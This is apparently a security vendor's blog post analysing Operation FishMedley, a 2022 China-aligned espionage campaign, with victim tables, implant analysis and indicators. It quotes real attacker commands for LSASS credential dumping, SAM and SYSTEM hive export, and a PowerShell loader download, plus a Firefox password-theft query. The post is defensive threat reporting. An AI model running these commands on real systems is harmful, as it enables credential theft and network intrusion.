{"id":8736,"date":"2025-03-20T12:00:00","date_gmt":"2025-03-20T10:00:00","guid":{"rendered":"https:\/\/blog.eset.ee\/et\/?p=8736"},"modified":"2026-06-14T19:46:56","modified_gmt":"2026-06-14T16:46:56","slug":"operation-fishmedley-targeting-governments-ngos-and-think-tanks","status":"publish","type":"post","link":"https:\/\/blog.eset.ee\/et\/ru\/2025\/03\/20\/operation-fishmedley-targeting-governments-ngos-and-think-tanks\/","title":{"rendered":"Operation FishMedley targeting governments, NGOs, and think tanks"},"content":{"rendered":"<p>On March 5<sup>th<\/sup>, 2025, the US DOJ unsealed an indictment against employees of the Chinese contractor I\u2011SOON for their involvement in multiple global espionage operations. Those include attacks that we previously documented and attributed to the FishMonger APT group \u2013 I\u2011SOON\u2019s operational arm \u2013 including the compromise of seven organizations that we identified as being targeted in a 2022 campaign that we named Operation FishMedley.<\/p>\n<blockquote>\n<div><strong>Key points of this blogpost:<\/strong><\/div>\n<ul>\n<li>Verticals targeted during Operation FishMedley include governments, NGOs, and think tanks, across Asia, Europe, and the United States.<\/li>\n<li>Operators used implants \u2013 such as ShadowPad, SodaMaster, and Spyder \u2013 that are common or exclusive to China-aligned threat actors.<\/li>\n<li>We assess with high confidence that Operation FishMedley was conducted by the FishMonger APT group.<\/li>\n<li>Independent of the DOJ indictment, we determined that FishMonger is operated by I\u2011SOON.<\/li>\n<\/ul>\n<\/blockquote>\n<h2>FishMonger profile<\/h2>\n<p>FishMonger \u2013 a group believed to be operated by the Chinese contractor I\u2011SOON (see our <a href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/threat-reports\/eset-apt-activity-report-q4-2023-q1-2024.pdf\">Q4 2023-Q1 2024 APT Activity Report<\/a>) \u2013 falls under the Winnti Group umbrella and is most likely operating out of China, from the city of Chengdu where I\u2011SOON\u2019s office was <a href=\"https:\/\/substack.com\/home\/post\/p-155672015\">located<\/a>. FishMonger is also known as Earth Lusca, TAG\u201122, Aquatic Panda, or Red Dev 10. We <a href=\"https:\/\/www.welivesecurity.com\/2020\/01\/31\/winnti-group-targeting-universities-hong-kong\/\">published<\/a> an analysis of this group in early 2020 when it heavily targeted universities in Hong Kong during the civic protests that started in June 2019. We initially attributed the incident to Winnti Group but have since revised our attribution to FishMonger.<\/p>\n<p>The group is known to operate watering-hole attacks, as reported by <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/g\/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html\">Trend Micro<\/a>. FishMonger\u2019s toolset includes ShadowPad, Spyder, Cobalt Strike, FunnySwitch, SprySOCKS, and the BIOPASS RAT.<\/p>\n<h2>Overview<\/h2>\n<p>On March 5<sup>th<\/sup>, 2025, the US Department of Justice published a <a href=\"https:\/\/www.justice.gov\/opa\/pr\/justice-department-charges-12-chinese-contract-hackers-and-law-enforcement-officers-global\">press release<\/a> and unsealed an <a href=\"https:\/\/www.justice.gov\/usao-sdny\/media\/1391751\/dl?inline\">indictment<\/a> against I\u2011SOON employees and officers of China\u2019s Ministry of Public Security involved in multiple espionage campaigns from 2016 to 2023. The FBI also added those named in the indictment to its <a href=\"https:\/\/www.fbi.gov\/wanted\/cyber\/aquatic-panda-cyber-threat-actors\">\u201cmost wanted\u201d list<\/a> and published a poster, as seen in Figure 1.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 1. Names of FishMonger I-SOON members\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/03-25\/fishmedley\/figure-1.gif\" title=\"Figure 1. Names of FishMonger \/ I-SOON members (source: FBI)\" width=\"\"><figcaption><em>Figure 1. Names of FishMonger \/ I\u2011SOON members (source: FBI)<\/em><\/figcaption><\/figure>\n<p>The indictment describes several attacks that are strongly related to what we published in a <a href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/\">private APT intelligence report<\/a> in early 2023. In this blogpost, we share our technical knowledge about this global campaign that targeted governments, NGOs, and think tanks across Asia, Europe, and the United States. We believe that this information complements the recently published indictment.<\/p>\n<p>During 2022, we investigated several compromises where implants such as ShadowPad and SodaMaster, which are commonly employed by China-aligned threat actors, were used. We were able to cluster seven independent incidents for this blogpost and have named that campaign Operation FishMedley.<\/p>\n<h3>FishMonger and I-SOON<\/h3>\n<p>During our research, we were able to independently determine that FishMonger is an espionage team operated by I\u2011SOON, a Chinese contractor based in Chengdu that suffered an infamous document leak in 2024 \u2013 see this comprehensive analysis from <a href=\"https:\/\/harfanglab.io\/insidethelab\/isoon-leak-analysis\/\">Harfang Labs<\/a>.<\/p>\n<h3>Victimology<\/h3>\n<p>Table 1 shows details about the seven victims we identified. The verticals and countries are diverse, but most are of obvious interest to the Chinese government.<\/p>\n<p><em>Table 1. Victimology details<\/em><\/p>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"75\"><strong>Victim<\/strong>\n<\/td>\n<td width=\"161\"><strong>Date of compromise<\/strong>\n<\/td>\n<td width=\"123\"><strong>Country<\/strong>\n<\/td>\n<td width=\"262\"><strong>Vertical<\/strong>\n<\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"75\"><strong>A<\/strong>\n<\/td>\n<td width=\"161\">January 2022 <\/td>\n<td width=\"123\">Taiwan <\/td>\n<td width=\"262\">Governmental organization. <\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><strong>B<\/strong>\n<\/td>\n<td width=\"161\">January 2022 <\/td>\n<td width=\"123\">Hungary <\/td>\n<td width=\"262\">Catholic organization. <\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><strong>C<\/strong>\n<\/td>\n<td width=\"161\">February 2022 <\/td>\n<td width=\"123\">Turkey <\/td>\n<td width=\"262\">Unknown. <\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><strong>D<\/strong>\n<\/td>\n<td width=\"161\">March 2022 <\/td>\n<td width=\"123\">Thailand <\/td>\n<td width=\"262\">Governmental organization. <\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><strong>E<\/strong>\n<\/td>\n<td width=\"161\">April 2022 <\/td>\n<td width=\"123\">United States <\/td>\n<td width=\"262\">Catholic charity operating worldwide. <\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><strong>F<\/strong>\n<\/td>\n<td width=\"161\">June 2022 <\/td>\n<td width=\"123\">United States <\/td>\n<td width=\"262\">NGO \u2013 mainly active in Asia. <\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><strong>G<\/strong>\n<\/td>\n<td width=\"161\">October 2022 <\/td>\n<td width=\"123\">France <\/td>\n<td width=\"262\">Geopolitical think tank. <\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Table 2 summarizes the implants used during each intrusion of Operation FishMedley.<\/p>\n<p><em>Table 2. Details of the implants used against each victim<\/em><\/p>\n<\/p>\n<div>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td>Victim | Tool<\/td>\n<td>ScatterBee-packed ShadowPad<\/td>\n<td>Spyder<\/td>\n<td>SodaMaster<\/td>\n<td>RPipeCommander<\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"144\"><strong>A<\/strong><\/td>\n<td width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td width=\"125\">\n<\/td>\n<td width=\"125\">\n<\/td>\n<td width=\"125\">\n<\/td>\n<\/tr>\n<tr>\n<td width=\"144\"><strong>B<\/strong><\/td>\n<td width=\"125\">\n<\/td>\n<td width=\"125\">\n<\/td>\n<td width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td width=\"125\">\n<\/td>\n<\/tr>\n<tr>\n<td width=\"144\"><strong>C<\/strong><\/td>\n<td width=\"125\">\n<\/td>\n<td width=\"125\">\n<\/td>\n<td width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td width=\"125\">\n<\/td>\n<\/tr>\n<tr>\n<td width=\"144\"><strong>D<\/strong><\/td>\n<td width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td width=\"125\">\n<\/td>\n<td width=\"125\"><strong>\u25cf<\/strong><\/td>\n<\/tr>\n<tr>\n<td width=\"144\"><strong>E<\/strong><\/td>\n<td width=\"125\">\n<\/td>\n<td width=\"125\">\n<\/td>\n<td width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td width=\"125\">\n<\/td>\n<\/tr>\n<tr>\n<td width=\"144\"><strong>F<\/strong><\/td>\n<td width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td width=\"125\">\n<\/td>\n<td width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td width=\"125\">\n<\/td>\n<\/tr>\n<tr>\n<td width=\"144\"><strong>G<\/strong><\/td>\n<td width=\"125\">\n<\/td>\n<td width=\"125\">\n<\/td>\n<td width=\"125\"><strong>\u25cf<\/strong><\/td>\n<td width=\"125\">\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<h2>Technical analysis<\/h2>\n<h3>Initial access<\/h3>\n<p>We were unable to identify the initial compromise vectors. For most cases, the attackers seemed to have had privileged access inside the local network, such as domain administrator credentials.<\/p>\n<p>At Victim D, the attackers gained access to an admin console and used it to deploy implants on other machines in the local network. It is probable that they first compromised the machine of a sysadmin or security analyst and then stole credentials that allowed them to connect to the console.<\/p>\n<p>At Victim F, the implants were delivered using <a href=\"https:\/\/github.com\/fortra\/impacket\">Impacket<\/a>, which means that the attackers somehow previously compromised a high-privilege domain account.<\/p>\n<h3>Lateral movement<\/h3>\n<p>At Victim F, the operators also used Impacket to move laterally. They gathered information on other local machines and installed implants.<\/p>\n<p>Table 3 shows that the operators first did some manual reconnaissance using <span>quser.exe<\/span>, <span>wmic.exe<\/span>, and <span>ipconfig.exe<\/span>. Then they tried to get credentials and other secrets by <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2022\/10\/05\/detecting-and-preventing-lsass-credential-dumping-attacks\/\">dumping<\/a> the local security authority subsystem service (LSASS) process (PID 944). The PID of the process was obtained via <span>tasklist \/svc<\/span> and the dump was performed using <span>comsvcs.dll<\/span>, which is a known living-off-the-land binary (<a href=\"https:\/\/lolbas-project.github.io\/lolbas\/Libraries\/comsvcs\/\">LOLBIN<\/a>). Note that it is likely that the attackers executed <span>quser.exe<\/span> to see whether other users or admins were also logged in, meaning privileged accesses were present in LSASS. According to <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows-server\/administration\/windows-commands\/quser\">Microsoft documentation<\/a>, to use this command the attacker must have Full Control permission or special access permission.<\/p>\n<p>They also saved the registry hives <span>sam.hive<\/span> and <span>system.hive<\/span>, which can both contain secrets or credentials.<\/p>\n<p>Finally, they tried to dump the LSASS process again, using a <span>for<\/span> loop iterating over the output from <span>tasklist.exe<\/span>. We have seen this same code used on other machines, so it is a good idea to block or at least alert on it.<\/p>\n<p><em>Table 3. Commands executed via Impacket on a machine at Victim F<\/em><\/p>\n<h3><span><\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"141\"><strong>Timestamp (UTC)<\/strong><\/td>\n<td width=\"501\"><strong>Command<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"141\">2022-06-21 07:34:07<\/td>\n<td width=\"501\"><span>quser<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-21 14:41:23<\/td>\n<td width=\"501\"><span>wmic os get lastbootuptime<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-21 14:41:23<\/td>\n<td width=\"501\"><span>ipconfig \/all<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-21 14:41:23<\/td>\n<td width=\"501\"><span>tasklist \/svc<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-21 14:41:23<\/td>\n<td width=\"501\"><span>C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -c &#171;C:WindowsSystem32rundll32 C:windowssystem32comsvcs.dll, MiniDump 944 c:userspublicmusictemp.tmp full&#187;<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-21 14:41:23<\/td>\n<td width=\"501\"><span>reg save hklmsam C:userspublicmusicsam.hive<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-21 14:41:23<\/td>\n<td width=\"501\"><span>reg save hklmsystem C:userspublicmusicsystem.hive<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-21 14:41:23<\/td>\n<td width=\"501\"><span>net user<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-22 07:05:37<\/td>\n<td width=\"501\"><span>tasklist \/v<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-22 07:07:33<\/td>\n<td width=\"501\"><span>dir c:users<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"141\">2022-06-22 09:47:52<\/td>\n<td width=\"501\"><span>for \/f &#171;tokens=1,2 delims= &#187; ^%A in (&#8216;&#187;tasklist \/fi &#171;Imagename eq lsass.exe&#187; | find &#171;lsass&#187;&#187;&#8216;) do rundll32.exe C:windowsSystem32comsvcs.dll, MiniDump ^%B WindowsTempYDWS6P.xml full<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><\/span><\/h3>\n<h3>Toolset<\/h3>\n<h4>ShadowPad<\/h4>\n<p>ShadowPad is a well-known and privately sold modular backdoor, known to only be supplied to China-aligned APT groups, including <a href=\"https:\/\/www.welivesecurity.com\/2020\/01\/31\/winnti-group-targeting-universities-hong-kong\/\">FishMonger<\/a> and <a href=\"https:\/\/www.welivesecurity.com\/2021\/08\/24\/sidewalk-may-be-as-dangerous-as-crosswalk\/\">SparklingGoblin<\/a>, as documented by <a href=\"https:\/\/assets.sentinelone.com\/c\/Shadowpad?x=P42eqA#page=1\">SentinelOne<\/a>. In Operation FishMedley, the attackers used a ShadowPad version packed with <a href=\"https:\/\/www.pwc.co.uk\/issues\/cyber-security-services\/research\/chasing-shadows.html\">ScatterBee<\/a>.<\/p>\n<p>At Victim D, the loader was downloaded using the following PowerShell command:<\/p>\n<p><span>powershell (new-object System.Net.WebClient).DownloadFile(&#171;http:\/\/&lt;victim\u2019s_web_server_IP_address&gt;\/Images\/menu\/log.dll&#187;;&#187;c:userspubliclog.dll&#187;)<\/span><\/p>\n<p>This shows that the attackers compromised a web server at the victim\u2019s organization to use it as a staging server for their malware.<\/p>\n<p>At Victim F, Firefox was used to download the loader, from <span>http:\/\/5.188.230[.]47\/log.dll<\/span>. We don\u2019t know whether attackers had interactive access to the machine, whether another piece of malware was running in the Firefox process, or whether the victim was redirected to the download page, say via a watering-hole attack.<\/p>\n<p><span>log.dll<\/span> is side-loaded by an old Bitdefender executable (original name: <span>BDReinit.exe<\/span>) and loads ShadowPad from a file named <span>log.dll.dat<\/span>, which can be decrypted using the scripts provided in PwC\u2019s <a href=\"https:\/\/github.com\/PwCUK-CTO\/ScatterBee_Analysis\">GitHub<\/a> repository.<\/p>\n<p>We did not recover the <span>log.dll.dat<\/span> from the victim\u2019s machine, but we found a fake Adobe Flash installer on <a href=\"https:\/\/www.virustotal.com\/gui\/file\/9447B75AF497E5A7F99F1DED1C1D87C53B5B59FCE224A325932AD55EEF9E0E4A\">VirusTotal<\/a> with the identical <span>log.dll<\/span> file. The configuration of the ShadowPad payload is provided in Table 4.<\/p>\n<p><em>Table 4. ShadowPad configuration<\/em><\/p>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"198\"><strong>Field<\/strong><\/td>\n<td width=\"444\"><strong>Decrypted value<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"198\"><strong>Timestamp<\/strong><\/td>\n<td width=\"444\"><span>3\/14\/2022 10:52:16 PM<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Campaign code<\/strong><\/td>\n<td width=\"444\"><span>2203<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>File path<\/strong><\/td>\n<td width=\"444\"><span>%ALLUSERSPROFILE%DRMTest<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Spoofed name<\/strong><\/td>\n<td width=\"444\"><span>Test.exe<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Loader filename<\/strong><\/td>\n<td width=\"444\"><span>log.dll<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Payload filename<\/strong><\/td>\n<td width=\"444\"><span>log.dll.dat<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Service name<\/strong><\/td>\n<td width=\"444\"><span>MyTest2<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Alternative service name<\/strong><\/td>\n<td width=\"444\"><span>MyTest2<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Alternative service name<\/strong><\/td>\n<td width=\"444\"><span>MyTest2<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Registry key path<\/strong><\/td>\n<td width=\"444\"><span>SOFTWAREMicrosoftWindowsCurrentVersionRun<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Service description<\/strong><\/td>\n<td width=\"444\"><span>MyTest2<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Program to inject into<\/strong><\/td>\n<td width=\"444\"><span>%ProgramFiles%Windows Media Playerwmplayer.exe<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Alternative injection target<\/strong><\/td>\n<td width=\"444\"><span>N\/A<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Alternative injection target<\/strong><\/td>\n<td width=\"444\"><span>N\/A<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Alternative injection target<\/strong><\/td>\n<td width=\"444\"><span>%windir%system32svchost.exe<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>C&amp;C URL<\/strong><\/td>\n<td width=\"444\"><span>TCP:\/\/api.googleauthenticatoronline[.]com:443<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Alternative C&amp;C URL<\/strong><\/td>\n<td width=\"444\"><span>UDP:\/\/api.googleauthenticatoronline[.]com:443<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Alternative C&amp;C URL<\/strong><\/td>\n<td width=\"444\"><span>N\/A<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Alternative C&amp;C URL<\/strong><\/td>\n<td width=\"444\"><span>N\/A<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Proxy info string<\/strong><\/td>\n<td width=\"444\"><span>SOCKS4nnnnn<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Proxy info string<\/strong><\/td>\n<td width=\"444\"><span>SOCKS4nnnnn<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Proxy info string<\/strong><\/td>\n<td width=\"444\"><span>SOCKS5nnnnn<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"198\"><strong>Proxy info string<\/strong><\/td>\n<td width=\"444\"><span>SOCKS5nnnnn<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Note that from March 20<sup>th<\/sup>, 2022 to November 2<sup>nd<\/sup>, 2022, the C&amp;C domain resolved to <span>213.59.118[.]124<\/span>, which is mentioned in a VMware <a href=\"https:\/\/blogs.vmware.com\/security\/2022\/10\/threat-analysis-active-c2-discovery-using-protocol-emulation-part3-shadowpad.html\">blogpost<\/a> about ShadowPad.<\/p>\n<h4>Spyder<\/h4>\n<p>At Victim D, we detected another backdoor typically used by FishMonger: Spyder, a modular implant that was analyzed in great detail by <a href=\"https:\/\/st.drweb.com\/static\/new-www\/news\/2021\/march\/BackDoor.Spyder.1_en.pdf\">Dr.Web<\/a>.<\/p>\n<p>A Spyder loader was downloaded from <span>http:\/\/&lt;a_victim\u2019s_web_server_IP_address&gt;\/Images\/menu\/aa.doc<\/span> and dropped to <span>C:UsersPublictask.exe<\/span> around 18 hours after ShadowPad was installed.<\/p>\n<p>The loader \u2013 see Figure 2; reads the file <span>c:windowstempguid.dat<\/span> and decrypts its contents using AES-CBC. The encryption key is hardcoded: <span>F4 E4 C6 9E DE E0 9E 82 00 00 00 00 00 00 00 00<\/span>. The initialization vector (IV) is the first eight bytes of the key. Unfortunately, we were unable to recover the <span>guid.dat<\/span> file.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 2. Spyder loader\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/03-25\/fishmedley\/figure-2.png\" title=\"Figure 2. Spyder loader\" width=\"\"><figcaption><em>Figure 2. Spyder loader<\/em><\/figcaption><\/figure>\n<p>Then, the loader injects the decoded content \u2013 likely shellcode \u2013 into itself (<span>task.exe<\/span> process) as seen in Figure 3.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 3. Spyder loader \u2013 injection part\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/03-25\/fishmedley\/figure-3.png\" title=\"Figure 3. Spyder loader \u2013 injection part\" width=\"\"><figcaption><em>Figure 3. Spyder loader \u2013 injection part<\/em><\/figcaption><\/figure>\n<p>Despite not obtaining the encrypted final payload, our product did detect a Spyder payload in memory and it was almost identical to the Spyder variant documented by Dr.Web. The C&amp;C server was hardcoded to <span>61.238.103[.]165<\/span>.<\/p>\n<p>Interestingly, multiple subdomains of <span>junlper[.]com<\/span>, a known Spyder C&amp;C domain and a weak homoglyph domain to <span>juniper.net<\/span>, resolved to <span>61.238.103[.]165<\/span> in 2022.<\/p>\n<p>A self-signed TLS certificate was present on port 443 of the server from May to December 2022, with the thumbprint <span>89EDCFFC66EDA3AEB75E140816702F9AC73A75F0<\/span>. According to <a href=\"https:\/\/github.com\/SentineLabs\/Shadowpad\/blob\/main\/technical-indicators\">SentinelOne<\/a>, it is a certificate used by FishMonger for its C&amp;C servers.<\/p>\n<h4>SodaMaster<\/h4>\n<p>SodaMaster is a backdoor that was documented by <a href=\"https:\/\/securelist.com\/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign\/101519\/\">Kaspersky<\/a> in 2021. APT10 was the first group known to have access to this backdoor but Operation FishMedley indicates that it may now be shared among multiple China-aligned APT groups.<\/p>\n<p>SodaMaster can only be found decrypted in memory and that\u2019s where we detected it. Even though we did not recover the full loading chain, we have identified a few samples that are the first step of the chain.<\/p>\n<h5>SodaMaster loaders<\/h5>\n<p>We found six different malicious DLLs that are abusing legitimate executables via <a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1574\/002\/\">DLL side-loading<\/a>. They all implement the same decryption and injection routine.<\/p>\n<p>First, the loader reads a hardcoded file, for example <span>debug.png<\/span>, and XOR decrypts it using a hardcoded 239-byte key. Table 5 summarizes the different loaders. Note that the XOR key is also different in each sample, but too long to be included in the table. Also note that we did not recover any of these encrypted payloads.<\/p>\n<p><em>Table 5. SodaMaster loaders<\/em><\/p>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"179\"><strong>SHA-1<\/strong><\/td>\n<td width=\"170\"><strong>DLL name<\/strong><\/td>\n<td width=\"293\"><strong>Payload filename<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"179\"><span>3C08C694C222E7346BD8<wbr><\/wbr>633461C5D19EAE18B661<\/span><\/td>\n<td width=\"170\"><span>DrsSDK.dll<\/span><\/td>\n<td width=\"293\"><span>&lt;current_directory&gt;debug.png<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>D8B631C551845F892EBB<wbr><\/wbr>5E7D09991F6C9D4FACAD<\/span><\/td>\n<td width=\"170\"><span>libvlc.dll<\/span><\/td>\n<td width=\"293\"><span>&lt;current_directory&gt;vlc.cnf<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>3A702704653EC847CF91<wbr><\/wbr>21E3F454F3DBE1F90AFD<\/span><\/td>\n<td width=\"170\"><span>safestore64.dll<\/span><\/td>\n<td width=\"293\"><span>&lt;current_directory&gt;Location<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>3630F62771360540B667<wbr><\/wbr>01ABC8F6C868087A6918<\/span><\/td>\n<td width=\"170\"><span>DeElevator64.dll<\/span><\/td>\n<td width=\"293\"><span>&lt;current_directory&gt;Location<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>A4F68D0F1C72C3AC9D70<wbr><\/wbr>919C17DC52692C43599E<\/span><\/td>\n<td width=\"170\"><span>libmaxminddb-0.dll<\/span><\/td>\n<td width=\"293\"><span>C:windowssystem32<wbr><\/wbr>MsKeyboardFilterapi.dll<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>5401E3EF903AFE981CFC<wbr><\/wbr>2840D5F0EF2F1D83B0BF<\/span><\/td>\n<td width=\"170\"><span>safestore641.dll<\/span><\/td>\n<td width=\"293\"><span>&lt;current_directory&gt;Location<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Then, the decrypted buffer is injected into a newly created, suspended <span>svchost.exe<\/span> process \u2013 see Figure 4.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 4. SodaMaster injection\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/03-25\/fishmedley\/figure-4.png\" title=\"Figure 4. SodaMaster injection\" width=\"\"><figcaption><em>Figure 4. SodaMaster injection<\/em><\/figcaption><\/figure>\n<p>Finally, the shellcode is executed using either <span>CreateRemoteThread<\/span> (on Windows XP or older versions) or, on newer Windows versions, via <span>NtCreateThreadEx<\/span> as shown in Figure 5.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 5. Execution of the injected payload\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/03-25\/fishmedley\/figure-5.png\" title=\"Figure 5. Execution of the injected payload\" width=\"\"><figcaption><em>Figure 5. Execution of the injected payload<\/em><\/figcaption><\/figure>\n<p>The last four loaders in Table 5 have additional features:<\/p>\n<ul>\n<li>They have an export named <span>getAllAuthData<\/span> that implements a password stealer for Firefox. It reads the Firefox SQLite database and runs the query <span>SELECT encryptedUsername, encryptedPassword, hostname,httpRealm FROM moz_logins<\/span>.<\/li>\n<li>The last three loaders persist as a service named <span>Netlock<\/span>, <span>MsKeyboardFiltersrv<\/span>, and <span>downmap<\/span>, respectively.<\/li>\n<\/ul>\n<h5>SodaMaster payload<\/h5>\n<p>As mentioned above, the SodaMaster payload was publicly analyzed by Kaspersky and the samples we\u2019ve found don\u2019t seem to have evolved much. They still implement the same four backdoor commands (<span>d<\/span>, <span>f<\/span>, <span>l<\/span>, and <span>s<\/span>) that were present in 2021.<\/p>\n<p>Table 6 shows the configurations from the four different SodaMaster payloads that we identified. Operators used a different C&amp;C server per victim, but we can see that Victims B and C share the same hardcoded RSA key.<\/p>\n<p><em>Table 6. SodaMaster configuration<\/em><\/p>\n<h4><span><\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"56\"><strong>Victim<\/strong><\/td>\n<td width=\"142\"><strong>C&amp;C server<\/strong><\/td>\n<td width=\"438\"><strong>RSA key<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"56\"><strong>B<\/strong><\/td>\n<td width=\"142\"><span>162.33.178[.]23<\/span><\/td>\n<td width=\"438\"><span>MIGJAoGBAOPjO7DslhZvp0t8HNU\/NWPIwstzwi61JlevD6TJtv\/TZuN6Cg<wbr><\/wbr>XMCXql0P3CBGPVU5gAJiTxH0vslwdIpWeWEZZ5eJVk0VK9vA6XfCsc4NDV<wbr><\/wbr>DPm7M5EH5sxHQjRNfe6H6RqcayAQn2YXd0Yua4S22F9ZmocU7VcPyLQLeV<wbr><\/wbr>ZoKjcxAgMBAAE=<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"56\"><strong>C<\/strong><\/td>\n<td width=\"142\"><span>78.141.202[.]70<\/span><\/td>\n<td width=\"438\"><span>MIGJAoGBAOPjO7DslhZvp0t8HNU\/NWPIwstzwi61JlevD6TJtv\/TZuN6Cg<wbr><\/wbr>XMCXql0P3CBGPVU5gAJiTxH0vslwdIpWeWEZZ5eJVk0VK9vA6XfCsc4NDV<wbr><\/wbr>DPm7M5EH5sxHQjRNfe6H6RqcayAQn2YXd0Yua4S22F9ZmocU7VcPyLQLeV<wbr><\/wbr>ZoKjcxAgMBAAE=<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"56\"><strong>F<\/strong><\/td>\n<td width=\"142\"><span>192.46.223[.]211<\/span><\/td>\n<td width=\"438\"><span>MIGJAoGBAMYOg+eoTREKaAESDXt3Uh3Y4J84ObD1dfl3dOji0G24UlbHdj<wbr><\/wbr>Uk3e+\/dtHjPsRZOfdLkwtz8SIZZVVt3pJGxgx9oyRtckJ6zsrYm\/JIK+7b<wbr><\/wbr>XikGf7sgs5zCItcaNJ1HFKoA9YQpfxXrwoHMCkaGb9NhsdsQ2k2q4jT68H<wbr><\/wbr>ygzq19AgMBAAE=<\/span><\/td>\n<\/tr>\n<tr>\n<td width=\"56\"><strong>G<\/strong><\/td>\n<td width=\"142\"><span>168.100.10[.]136<\/span><\/td>\n<td 